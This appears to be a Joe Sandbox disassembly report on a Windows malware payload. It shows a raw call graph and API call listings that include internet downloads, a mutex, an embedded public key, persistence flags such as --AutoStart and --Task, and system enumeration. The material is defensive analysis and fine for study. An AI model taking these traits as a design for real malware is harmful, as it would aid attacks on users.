39726->39734 39731->39697 39735 f11396 39732->39735 39734->39705 39737 f11660 lstrlenA WriteFile 39734->39737 39735->39394 39737->39705 39739 f11686 CloseHandle 39737->39739 39740 f13100 59 API calls 39739->39740 39741 f116a3 39740->39741 39742 f159d0 59 API calls 39741->39742 39744 f116be MoveFileW 39742->39744 39746 f116e4 VirtualFree 39744->39746 39750 f118a7 39744->39750 39751 f116fc 39746->39751 39754 f118e3 39750->39754 39755 f118d5 VirtualFree 39750->39755 39751->39394 39754->39707 39758 f118e8 CloseHandle 39754->39758 39755->39754 39758->39707 39770->39706 39772->39397 39774 f1bab9 39773->39774 39775 f1babb ShowWindow UpdateWindow 39773->39775 39774->39399 39775->39399 39777 f10a81 39776->39777 39778 f10bb4 39777->39778 39779 f156d0 59 API calls 39777->39779 39780 f13ea0 59 API calls 39777->39780 39783 f13ff0 59 API calls 39777->39783 39784 f12900 60 API calls 39777->39784 39785 f13580 59 API calls 39777->39785 39778->39403 39779->39777 39781 f10ae0 SetErrorMode PathFileExistsA SetErrorMode 39780->39781 39781->39777 39782 f10b0c GetDriveTypeA 39781->39782 39782->39777 39783->39777 39784->39777 39785->39777 39786->39429 40819 f1f130 timeGetTime 39786->40819 39787->39409 41023 f1fd80 39787->41023 39788->39181 39790 f11ad0 39789->39790 39791 f11af4 39789->39791 39792 f11afc 39790->39792 39793 f11adc DispatchMessageW PeekMessageW 39790->39793 39791->39224 39792->39224 39793->39790 39793->39791 39794->39250 39795->39226 39796->39370 39797->39402 39801 f15735 39800->39801 39802 f156de 39800->39802 39803 f157bc 39801->39803 39804 f1573e 39801->39804 39802->39801 39811 f15704 39802->39811 39821 f4f23e 59 API calls 2 library calls 39803->39821 39806 f16760 59 API calls 39804->39806 39809 f15750 _signal 39804->39809 39806->39809 39809->39501 39813 f15709 39811->39813 39814 f1571f 39811->39814 39815 f13ff0 59 API calls 39813->39815 39816 f13ff0 59 API calls 39814->39816 39817 f15719 39815->39817 39818 f1572f 39816->39818 39817->39501 39818->39501 39819->39505 
39820->39507 39824->39523 39825->39523 39829 f31570 39826->39829 39830 f31580 39829->39830 39831 f31586 39830->39831 39833 f315ae 39830->39833 39832 f25208 ___crtsetenv 58 API calls 39831->39832 39834 f3158b 39832->39834 39838 f315cf wcstoxl 39833->39838 39841 f2e883 GetStringTypeW 39833->39841 39840 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39834->39840 39837 f25208 ___crtsetenv 58 API calls 39839 f1a36e lstrcpyW lstrcpyW 39837->39839 39838->39837 39838->39839 39839->39218 39840->39839 39841->39833 39843 f20241 39842->39843 39844 f202b6 39842->39844 39846 f25208 ___crtsetenv 58 API calls 39843->39846 39848 f20266 39843->39848 39853 f202c8 60 API calls 3 library calls 39844->39853 39849 f2024d 39846->39849 39847 f202c3 39847->39540 39848->39540 39852 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39849->39852 39851 f20258 39851->39540 39852->39851 39853->39847 39854->39567 39855->39566 39859 f20c62 _malloc 58 API calls 39858->39859 39860 f0e684 39859->39860 39861 f20c62 _malloc 58 API calls 39860->39861 39862 f0e690 39861->39862 39863 f0e6b4 GetAdaptersInfo 39862->39863 39864 f0e699 39862->39864 39866 f0e6c4 39863->39866 39867 f0e6db GetAdaptersInfo 39863->39867 39865 f21f2d _wprintf 85 API calls 39864->39865 39870 f0e6a3 39865->39870 39871 f20bed _free 58 API calls 39866->39871 39868 f0e741 39867->39868 39869 f0e6ea 39867->39869 39875 f20bed _free 58 API calls 39868->39875 39908 f204a6 39869->39908 39874 f20bed _free 58 API calls 39870->39874 39872 f0e6ca 39871->39872 39876 f20c62 _malloc 58 API calls 39872->39876 39878 f0e6a9 39874->39878 39879 f0e74a 39875->39879 39880 f0e6d2 39876->39880 39878->39570 39879->39570 39880->39864 39880->39867 39882 f0e737 39883 f21f2d _wprintf 85 API calls 39882->39883 39883->39868 39885 f156d0 59 API calls 39884->39885 39886 f0e8bb CryptAcquireContextW 39885->39886 39887 f0e8d8 39886->39887 39888 f0e8e9 CryptCreateHash 39886->39888 40149 f30eca RaiseException 39887->40149 39890 f0e903 39888->39890 39891 f0e914 
CryptHashData 39888->39891 40150 f30eca RaiseException 39890->40150 39893 f0e932 39891->39893 39894 f0e943 CryptGetHashParam 39891->39894 40151 f30eca RaiseException 39893->40151 39896 f0e963 39894->39896 39898 f0e974 _memset 39894->39898 40152 f30eca RaiseException 39896->40152 39899 f0e993 CryptGetHashParam 39898->39899 39900 f0e9a8 39899->39900 39906 f0e9b9 39899->39906 40153 f30eca RaiseException 39900->40153 39902 f0ea10 39904 f0ea16 CryptDestroyHash CryptReleaseContext 39902->39904 39903 f204a6 _sprintf 83 API calls 39903->39906 39905 f0ea33 39904->39905 39905->39576 39906->39902 39906->39903 39907 f13ea0 59 API calls 39906->39907 39907->39906 39909 f204c2 39908->39909 39910 f204d7 39908->39910 39912 f25208 ___crtsetenv 58 API calls 39909->39912 39910->39909 39911 f204de 39910->39911 39937 f26ab6 39911->39937 39914 f204c7 39912->39914 39936 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39914->39936 39916 f20504 39917 f0e725 39916->39917 39961 f264ef 78 API calls 7 library calls 39916->39961 39919 f21f2d 39917->39919 39920 f21f39 _ungetc 39919->39920 39921 f21f4a 39920->39921 39922 f21f5f _wprintf 39920->39922 39923 f25208 ___crtsetenv 58 API calls 39921->39923 39997 f20e92 39922->39997 39924 f21f4f 39923->39924 40013 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39924->40013 39927 f21f6f _wprintf 40002 f2afd2 39927->40002 39928 f21f5a _ungetc 39928->39882 39930 f21f82 _wprintf 39931 f26ab6 __output_l 83 API calls 39930->39931 39932 f21f9b _wprintf 39931->39932 40009 f2afa1 39932->40009 39936->39917 39962 f2019c 39937->39962 39940 f25208 ___crtsetenv 58 API calls 39941 f26b30 39940->39941 39942 f27601 39941->39942 39954 f26b50 __output_l __aulldvrm _strlen 39941->39954 39977 f2816b 39941->39977 39943 f25208 ___crtsetenv 58 API calls 39942->39943 39944 f27606 39943->39944 39986 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39944->39986 39946 f275db 39970 f2a77e 39946->39970 39949 f275fd 39949->39916 39951 f2766a 78 API calls 
__output_l 39951->39954 39952 f271b9 DecodePointer 39952->39954 39953 f20bed _free 58 API calls 39953->39954 39954->39942 39954->39946 39954->39951 39954->39952 39954->39953 39956 f2721c DecodePointer 39954->39956 39957 f27241 DecodePointer 39954->39957 39958 f3adf7 60 API calls __cftof 39954->39958 39959 f276de 78 API calls _write_string 39954->39959 39960 f276b2 78 API calls _write_multi_char 39954->39960 39984 f22bcc 58 API calls _LocaleUpdate::_LocaleUpdate 39954->39984 39985 f28cde 58 API calls 2 library calls 39954->39985 39956->39954 39957->39954 39958->39954 39959->39954 39960->39954 39961->39917 39963 f201fa 39962->39963 39964 f201ad 39962->39964 39963->39940 39987 f25007 39964->39987 39966 f201b3 39968 f201da 39966->39968 39992 f245dc 58 API calls 6 library calls 39966->39992 39968->39963 39993 f2495e 58 API calls 6 library calls 39968->39993 39971 f2a786 39970->39971 39972 f2a788 IsProcessorFeaturePresent 39970->39972 39971->39949 39974 f2ab9c 39972->39974 39995 f2ab4b 5 API calls ___raise_securityfailure 39974->39995 39976 f2ac7f 39976->39949 39978 f28175 39977->39978 39979 f2818a 39977->39979 39980 f25208 ___crtsetenv 58 API calls 39978->39980 39979->39954 39981 f2817a 39980->39981 39996 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39981->39996 39983 f28185 39983->39954 39984->39954 39985->39954 39986->39946 39988 f2501f __getptd_noexit 58 API calls 39987->39988 39989 f2500d 39988->39989 39990 f2501a 39989->39990 39994 f27c2e 58 API calls 3 library calls 39989->39994 39990->39966 39992->39968 39993->39963 39995->39976 39996->39983 39998 f20eb3 EnterCriticalSection 39997->39998 39999 f20e9d 39997->39999 39998->39927 40000 f28af7 __lock 58 API calls 39999->40000 40001 f20ea6 40000->40001 40001->39927 40003 f2816b __fgetwc_nolock 58 API calls 40002->40003 40004 f2afdf 40003->40004 40015 f389c2 40004->40015 40006 f2afe5 _wprintf 40007 f2b034 40006->40007 40024 f28cde 58 API calls 2 library calls 40006->40024 40007->39930 40010 f21faf 40009->40010 
40011 f2afaa 40009->40011 40014 f21fc9 LeaveCriticalSection LeaveCriticalSection _wprintf __getstream 40010->40014 40011->40010 40026 f2836b 40011->40026 40013->39928 40014->39928 40016 f389da 40015->40016 40017 f389cd 40015->40017 40019 f25208 ___crtsetenv 58 API calls 40016->40019 40021 f389e6 40016->40021 40018 f25208 ___crtsetenv 58 API calls 40017->40018 40020 f389d2 40018->40020 40022 f38a07 40019->40022 40020->40006 40021->40006 40025 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40022->40025 40024->40007 40025->40020 40027 f2837e 40026->40027 40031 f283a2 40026->40031 40028 f2816b __fgetwc_nolock 58 API calls 40027->40028 40027->40031 40029 f2839b 40028->40029 40032 f2df14 40029->40032 40031->40010 40033 f2df20 _ungetc 40032->40033 40034 f2df44 40033->40034 40035 f2df2d 40033->40035 40037 f2dfe3 40034->40037 40039 f2df58 40034->40039 40132 f251d4 58 API calls __getptd_noexit 40035->40132 40136 f251d4 58 API calls __getptd_noexit 40037->40136 40038 f2df32 40041 f25208 ___crtsetenv 58 API calls 40038->40041 40042 f2df80 40039->40042 40043 f2df76 40039->40043 40052 f2df39 _ungetc 40041->40052 40060 f3b134 40042->40060 40133 f251d4 58 API calls __getptd_noexit 40043->40133 40044 f2df7b 40048 f25208 ___crtsetenv 58 API calls 40044->40048 40047 f2df86 40049 f2df99 40047->40049 40050 f2dfac 40047->40050 40051 f2dfef 40048->40051 40069 f2e003 40049->40069 40053 f25208 ___crtsetenv 58 API calls 40050->40053 40137 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40051->40137 40052->40031 40056 f2dfb1 40053->40056 40134 f251d4 58 API calls __getptd_noexit 40056->40134 40057 f2dfa5 40135 f2dfdb LeaveCriticalSection __unlock_fhandle 40057->40135 40061 f3b140 _ungetc 40060->40061 40062 f3b18f EnterCriticalSection 40061->40062 40064 f28af7 __lock 58 API calls 40061->40064 40063 f3b1b5 _ungetc 40062->40063 40063->40047 40065 f3b165 40064->40065 40066 f3b17d 40065->40066 40138 f3263e InitializeCriticalSectionAndSpinCount 40065->40138 40139 f3b1b9 
LeaveCriticalSection _doexit 40066->40139 40070 f2e010 __ftell_nolock 40069->40070 40071 f2e06e 40070->40071 40072 f2e04f 40070->40072 40105 f2e044 40070->40105 40077 f2e0c6 40071->40077 40078 f2e0aa 40071->40078 40140 f251d4 58 API calls __getptd_noexit 40072->40140 40073 f2a77e __ld12tod 6 API calls 40075 f2e864 40073->40075 40075->40057 40076 f2e054 40079 f25208 ___crtsetenv 58 API calls 40076->40079 40080 f2e0df 40077->40080 40144 f2f744 60 API calls 3 library calls 40077->40144 40142 f251d4 58 API calls __getptd_noexit 40078->40142 40082 f2e05b 40079->40082 40084 f389c2 __flsbuf 58 API calls 40080->40084 40141 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40082->40141 40087 f2e0ed 40084->40087 40085 f2e0af 40088 f25208 ___crtsetenv 58 API calls 40085->40088 40090 f2e446 40087->40090 40094 f25007 __putch_nolock 58 API calls 40087->40094 40089 f2e0b6 40088->40089 40143 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40089->40143 40092 f2e464 40090->40092 40093 f2e7d9 WriteFile 40090->40093 40095 f2e588 40092->40095 40103 f2e47a 40092->40103 40096 f2e439 GetLastError 40093->40096 40097 f2e678 40093->40097 40100 f2e119 GetConsoleMode 40094->40100 40107 f2e67d 40095->40107 40108 f2e593 40095->40108 40099 f2e406 40096->40099 40097->40099 40098 f2e812 40098->40105 40106 f25208 ___crtsetenv 58 API calls 40098->40106 40099->40098 40099->40105 40110 f2e566 40099->40110 40100->40090 40101 f2e158 40100->40101 40101->40090 40102 f2e168 GetConsoleCP 40101->40102 40102->40098 40129 f2e197 40102->40129 40103->40098 40103->40099 40104 f2e4e9 WriteFile 40103->40104 40104->40096 40104->40103 40105->40073 40109 f2e840 40106->40109 40107->40098 40111 f2e6f2 WideCharToMultiByte 40107->40111 40108->40098 40112 f2e5f8 WriteFile 40108->40112 40148 f251d4 58 API calls __getptd_noexit 40109->40148 40114 f2e571 40110->40114 40115 f2e809 40110->40115 40111->40096 40124 f2e739 40111->40124 40112->40096 40117 f2e647 40112->40117 40118 f25208 ___crtsetenv 58 API calls 
40114->40118 40147 f251e7 58 API calls 3 library calls 40115->40147 40117->40097 40117->40099 40117->40108 40120 f2e576 40118->40120 40119 f2e741 WriteFile 40123 f2e794 GetLastError 40119->40123 40119->40124 40146 f251d4 58 API calls __getptd_noexit 40120->40146 40123->40124 40124->40097 40124->40099 40124->40107 40124->40119 40125 f4058c WriteConsoleW CreateFileW __putwch_nolock 40130 f2e2ed 40125->40130 40126 f2e280 WideCharToMultiByte 40126->40099 40128 f2e2bb WriteFile 40126->40128 40127 f3c76c 60 API calls __fgetwc_nolock 40127->40129 40128->40096 40128->40130 40129->40099 40129->40126 40129->40127 40129->40130 40145 f22d33 58 API calls __isleadbyte_l 40129->40145 40130->40096 40130->40099 40130->40125 40130->40129 40131 f2e315 WriteFile 40130->40131 40131->40096 40131->40130 40132->40038 40133->40044 40134->40057 40135->40052 40136->40044 40137->40052 40138->40066 40139->40062 40140->40076 40141->40105 40142->40085 40143->40105 40144->40080 40145->40129 40146->40105 40147->40105 40148->40105 40149->39888 40150->39891 40151->39894 40152->39898 40153->39906 40155 f13c62 40154->40155 40162 f13c74 _memset 40154->40162 40156 f13c67 40155->40156 40157 f13c96 40155->40157 40158 f23b4c 59 API calls 40156->40158 40171 f4f23e 59 API calls 2 library calls 40157->40171 40160 f13c6d 40158->40160 40160->40162 40172 f4f1bb 59 API calls 3 library calls 40160->40172 40162->39581 40165 f18513 40164->40165 40168 f18520 40164->40168 40165->40168 40173 f15810 40165->40173 40166 f18619 40166->39583 40168->40166 40169 f4f23e 59 API calls 40168->40169 40170 f16760 59 API calls 40168->40170 40169->40168 40170->40168 40174 f15823 40173->40174 40175 f158b6 40173->40175 40177 f16760 59 API calls 40174->40177 40179 f15841 _signal 40174->40179 40181 f4f23e 59 API calls 2 library calls 40175->40181 40178 f15833 40177->40178 40178->40168 40179->40168 40182->39585 40183->39588 40184->39591 40185->39596 40186->39598 40187->39618 40188->39618 40189->39643 40190->39643 40191->39651 40192->39651 
40193->39656 40233 f21037 40194->40233 40196 f0c78a 40196->39669 40197 f20546 40196->40197 40198 f20550 40197->40198 40199 f20564 40197->40199 40200 f25208 ___crtsetenv 58 API calls 40198->40200 40199->39684 40201 f20555 40200->40201 40434 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40201->40434 40203 f20560 40203->39684 40206 f2110d _ungetc 40204->40206 40205 f2111e 40207 f25208 ___crtsetenv 58 API calls 40205->40207 40206->40205 40208 f2114c 40206->40208 40209 f21123 40207->40209 40213 f2112e _ungetc 40208->40213 40435 f20e53 40208->40435 40480 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40209->40480 40212 f2115b 40216 f2117d 40212->40216 40441 f29312 40212->40441 40213->39684 40481 f211b5 LeaveCriticalSection LeaveCriticalSection _fprintf 40216->40481 40218 f23a44 _ungetc 40217->40218 40219 f23a70 40218->40219 40220 f23a58 40218->40220 40222 f20e53 __lock_file 59 API calls 40219->40222 40226 f23a68 _ungetc 40219->40226 40221 f25208 ___crtsetenv 58 API calls 40220->40221 40223 f23a5d 40221->40223 40224 f23a82 40222->40224 40645 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40223->40645 40629 f239cc 40224->40629 40226->39669 40230->39671 40231->39676 40232->39680 40235 f21043 _ungetc 40233->40235 40234 f21056 40236 f25208 ___crtsetenv 58 API calls 40234->40236 40235->40234 40237 f21087 40235->40237 40238 f2105b 40236->40238 40252 f28df4 40237->40252 40282 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40238->40282 40241 f2108c 40242 f210a2 40241->40242 40243 f21095 40241->40243 40245 f210cc 40242->40245 40246 f210ac 40242->40246 40244 f25208 ___crtsetenv 58 API calls 40243->40244 40250 f21066 _ungetc @_EH4_CallFilterFunc@8 40244->40250 40267 f28f13 40245->40267 40248 f25208 ___crtsetenv 58 API calls 40246->40248 40248->40250 40250->40196 40253 f28e00 _ungetc 40252->40253 40254 f28af7 __lock 58 API calls 40253->40254 40264 f28e0e 40254->40264 40255 f28e82 40284 f28f0a 40255->40284 40256 f28e89 40288 f28cde 58 API calls 2 
library calls 40256->40288 40259 f28eff _ungetc 40259->40241 40260 f28e90 40260->40255 40289 f3263e InitializeCriticalSectionAndSpinCount 40260->40289 40261 f28b9f __mtinitlocknum 58 API calls 40261->40264 40262 f20e92 _wprintf 59 API calls 40262->40264 40264->40255 40264->40256 40264->40261 40264->40262 40287 f20efc LeaveCriticalSection LeaveCriticalSection _doexit 40264->40287 40265 f28eb6 EnterCriticalSection 40265->40255 40268 f28f33 __wsetlocale_nolock 40267->40268 40269 f28f4d 40268->40269 40281 f29108 40268->40281 40295 f3c232 60 API calls 2 library calls 40268->40295 40270 f25208 ___crtsetenv 58 API calls 40269->40270 40271 f28f52 40270->40271 40294 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40271->40294 40273 f2916b 40291 f3c214 40273->40291 40275 f210d7 40283 f210f9 LeaveCriticalSection LeaveCriticalSection _fprintf 40275->40283 40277 f29101 40277->40281 40296 f3c232 60 API calls 2 library calls 40277->40296 40279 f29120 40279->40281 40297 f3c232 60 API calls 2 library calls 40279->40297 40281->40269 40281->40273 40282->40250 40283->40250 40290 f28c81 LeaveCriticalSection 40284->40290 40286 f28f11 40286->40259 40287->40264 40288->40260 40289->40265 40290->40286 40298 f3b9f8 40291->40298 40293 f3c22d 40293->40275 40294->40275 40295->40277 40296->40279 40297->40281 40301 f3ba04 _ungetc 40298->40301 40299 f3ba1a 40300 f25208 ___crtsetenv 58 API calls 40299->40300 40302 f3ba1f 40300->40302 40301->40299 40303 f3ba50 40301->40303 40381 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40302->40381 40309 f3bac1 40303->40309 40307 f3ba29 _ungetc 40307->40293 40310 f3bae1 40309->40310 40383 f47f50 40310->40383 40313 f3c213 40314 f3bafd 40315 f3bb37 40314->40315 40320 f3bb5a 40314->40320 40356 f3bc34 40314->40356 40414 f251d4 58 API calls __getptd_noexit 40315->40414 40317 f3bb3c 40318 f25208 ___crtsetenv 58 API calls 40317->40318 40319 f3bb49 40318->40319 40415 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40319->40415 40321 f3bc18 
40320->40321 40329 f3bbf6 40320->40329 40416 f251d4 58 API calls __getptd_noexit 40321->40416 40324 f3ba6c 40382 f3ba95 LeaveCriticalSection __unlock_fhandle 40324->40382 40325 f3bc1d 40326 f25208 ___crtsetenv 58 API calls 40325->40326 40327 f3bc2a 40326->40327 40417 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40327->40417 40390 f3b1c2 40329->40390 40331 f3bcc4 40332 f3bcf1 40331->40332 40333 f3bcce 40331->40333 40408 f3b88d 40332->40408 40418 f251d4 58 API calls __getptd_noexit 40333->40418 40336 f3bcd3 40338 f25208 ___crtsetenv 58 API calls 40336->40338 40337 f3bd91 GetFileType 40339 f3bdde 40337->40339 40340 f3bd9c GetLastError 40337->40340 40342 f3bcdd 40338->40342 40421 f3b56e 59 API calls 2 library calls 40339->40421 40420 f251e7 58 API calls 3 library calls 40340->40420 40341 f3bd5f GetLastError 40419 f251e7 58 API calls 3 library calls 40341->40419 40346 f25208 ___crtsetenv 58 API calls 40342->40346 40346->40324 40347 f3bdc3 CloseHandle 40349 f3bdd1 40347->40349 40350 f3bd84 40347->40350 40348 f3b88d ___createFile 3 API calls 40351 f3bd54 40348->40351 40353 f25208 ___crtsetenv 58 API calls 40349->40353 40354 f25208 ___crtsetenv 58 API calls 40350->40354 40351->40337 40351->40341 40355 f3bdd6 40353->40355 40354->40356 40355->40350 40429 f242fd 8 API calls 2 library calls 40356->40429 40357 f3bfb7 40357->40356 40361 f3c18a CloseHandle 40357->40361 40358 f3bdfc 40358->40357 40376 f3be7d 40358->40376 40422 f2f744 60 API calls 3 library calls 40358->40422 40360 f3be66 40360->40376 40423 f251d4 58 API calls __getptd_noexit 40360->40423 40362 f3b88d ___createFile 3 API calls 40361->40362 40363 f3c1b1 40362->40363 40366 f3c041 40363->40366 40367 f3c1b9 GetLastError 40363->40367 40365 f2b5c4 70 API calls __read_nolock 40365->40376 40366->40356 40427 f251e7 58 API calls 3 library calls 40367->40427 40371 f3be85 40371->40376 40424 f30b25 61 API calls 3 library calls 40371->40424 40425 f47cac 82 API calls 6 library calls 40371->40425 40374 f2f744 60 API 
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F0CF10: _memset.LIBCMT ref: 00F0CF4A
                                                                                                          • Part of subcall function 00F0CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F0CF5F
                                                                                                          • Part of subcall function 00F0CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F0CFA6
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F19FC4
                                                                                                        • GetLastError.KERNEL32 ref: 00F19FD2
                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00F19FDA
                                                                                                        • GetLastError.KERNEL32 ref: 00F19FE4
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,007737D0,?), ref: 00F1A0BB
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1A0C2
                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00F1A161
                                                                                                          • Part of subcall function 00F124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F124FE
                                                                                                          • Part of subcall function 00F124E0: GetLastError.KERNEL32 ref: 00F12509
                                                                                                          • Part of subcall function 00F124E0: CloseHandle.KERNEL32 ref: 00F1251C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2957410896-1250862213
                                                                                                        • Opcode ID: febf7de6c19b89689b4e389547eb1e6ceda67945a2a5fc4cc536139239ad0642
                                                                                                        • Instruction ID: e2f7f2306942453b3014b3430aabdd7e328cebd00f8a65a1227e3e94bac42af7
                                                                                                        • Opcode Fuzzy Hash: febf7de6c19b89689b4e389547eb1e6ceda67945a2a5fc4cc536139239ad0642
                                                                                                        • Instruction Fuzzy Hash: 72D2D371604341ABD724EF24DC56BDB77E5BF94304F00091CF48587292EB79AA89EB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetVersionExA.KERNEL32(00000094), ref: 00F81983
                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00F81994
                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00F819A1
                                                                                                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00F819AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00F819E8
                                                                                                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00F819FB
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00F81A2D
                                                                                                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00F81A81
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F81AC5
                                                                                                        • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00F81ADB
                                                                                                        • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00F81AEE
                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00F81B01
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F81C15
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00F81C36
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00F81C50
                                                                                                        • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00F81C63
                                                                                                        • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00F81C76
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F81D45
                                                                                                        • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00F81D73
                                                                                                        • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00F81D86
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32First), ref: 00F81D99
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00F81DAC
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00F81DBF
                                                                                                        • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00F81DD2
                                                                                                        • GetProcAddress.KERNEL32(?,Process32First), ref: 00F81DE5
                                                                                                        • GetProcAddress.KERNEL32(?,Process32Next), ref: 00F81DF8
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32First), ref: 00F81E0B
                                                                                                        • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00F81E1E
                                                                                                        • GetProcAddress.KERNEL32(?,Module32First), ref: 00F81E31
                                                                                                        • GetProcAddress.KERNEL32(?,Module32Next), ref: 00F81E44
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F81EDD
                                                                                                        • GetTickCount.KERNEL32 ref: 00F81F03
                                                                                                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00F81F1A
                                                                                                        • Heap32First.KERNEL32(00000024,?,?), ref: 00F81F95
                                                                                                        • Heap32Next.KERNEL32(?,?,?,?,?,D1E38783), ref: 00F81FE3
                                                                                                        • GetTickCount.KERNEL32 ref: 00F81FF1
                                                                                                        • Heap32ListNext.KERNEL32(?,?), ref: 00F82058
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82066
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82095
                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 00F820AA
                                                                                                        • GetTickCount.KERNEL32 ref: 00F820FB
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82118
                                                                                                        • GetTickCount.KERNEL32 ref: 00F82187
                                                                                                        • GetTickCount.KERNEL32 ref: 00F821A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
